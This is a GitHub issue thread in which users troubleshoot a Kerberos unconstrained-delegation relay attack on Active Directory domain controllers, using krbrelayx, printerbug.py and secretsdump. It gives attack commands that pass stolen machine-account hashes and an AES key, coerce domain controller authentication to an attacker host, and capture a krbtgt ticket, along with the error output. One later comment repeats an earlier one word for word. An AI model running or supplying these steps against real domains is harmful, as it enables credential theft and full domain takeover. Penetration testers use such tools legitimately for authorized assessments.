Closed girlgirlbest closed 4 years ago
dirkjanm
commented
4 years ago It only authenticates with NTLM, which indicates that there is no SPN set for the cifs/attacker.test.com hostname. You probably skipped the step where you'd need to add an SPN for that host as well.
girlgirlbest
commented
4 years ago In your blog, wrote need SPN with service HOST/attacker.test.com; For me now worked with HOST, but i get one more question; I usage printer bug versus primary-dc.test.com Krbrelayx output: Got ticket for primary-dc.test.com [krbtgt@test.com] But if i'am usage versus secondary-dc.test.com Krbrelayx output SMBD: receiver connection from "ip address" Delegate info not set, cannot extract ticket! Make sure the account you use has unconstrained delegation rights.
secondary-dc.test.com=Windows 2012 server primary-dc.test.com = Windows 2012 server I checked , both dc have unconstrained delegation;
dirkjanm
commented
4 years ago I'm not sure what would cause that but for some reason the secondary DC does not think your attacker account has unconstrained delegation.
girlgirlbest
commented
4 years ago Great thanks; Last question )))
If i'am usage printerbug.py versus Windows service 2008 sp2
Output:
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Traceback (most recent call last):
File "printerbug.py", line 198, in
python rcpdump.py test\administrator@"ip address windows 2008 server" Protocol [MS-RPRN]: Print System Remote Protocol Presense
dirkjanm
commented
4 years ago Not quite sure what causes this, could be something 2008 specific but I don't have it here to test.
Cyb3rGh0st786
commented
1 year ago In your blog, wrote need SPN with service HOST/attacker.test.com; For me now worked with HOST, but i get one more question; I usage printer bug versus primary-dc.test.com Krbrelayx output: Got ticket for primary-dc.test.com [krbtgt@test.com] But if i'am usage versus secondary-dc.test.com Krbrelayx output SMBD: receiver connection from "ip address" Delegate info not set, cannot extract ticket! Make sure the account you use has unconstrained delegation rights.
secondary-dc.test.com=Windows 2012 server primary-dc.test.com = Windows 2012 server I checked , both dc have unconstrained delegation;
@girlgirlbest how did it work, I have added both HOST and CIFS but did not work for me . Still getting the below error. Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
Hello help me please ; I'am read blog; Use secretsdump,get account machine(computer.test.com) aes256 key & lm:ntlm hashes; Add dns A record for my attacker machine. For ex. attacker.test.com python krbrelayx.py -aesKEY "aes256key" python printerbug.py -hashes lm:ntlm test.com/computer\$@primary-dc.test.com attacker.test.com printerbug output: [] Attempting to trigger authentication via rprn RPC at primary-dc.test.com [] Bind OK [] Got handle DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [] Triggered RPC backconnect, this may or ma not have worked
krbrelayx output: Procotol client ldaps loaded.. Procotol client ldap loaded.. Procotol client smb loaded..
SMBD: Received connection from "ip address primary-dc.test.com" Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider' SMBD: Received connection from "ip address primary-dc.test.com" Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider' SMBD: Received connection from "ip address primary-dc.test.com" Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
Computer.test.com =Windows 7 primary-dc.test.com = Windows 2012 server attacker.test.com = kali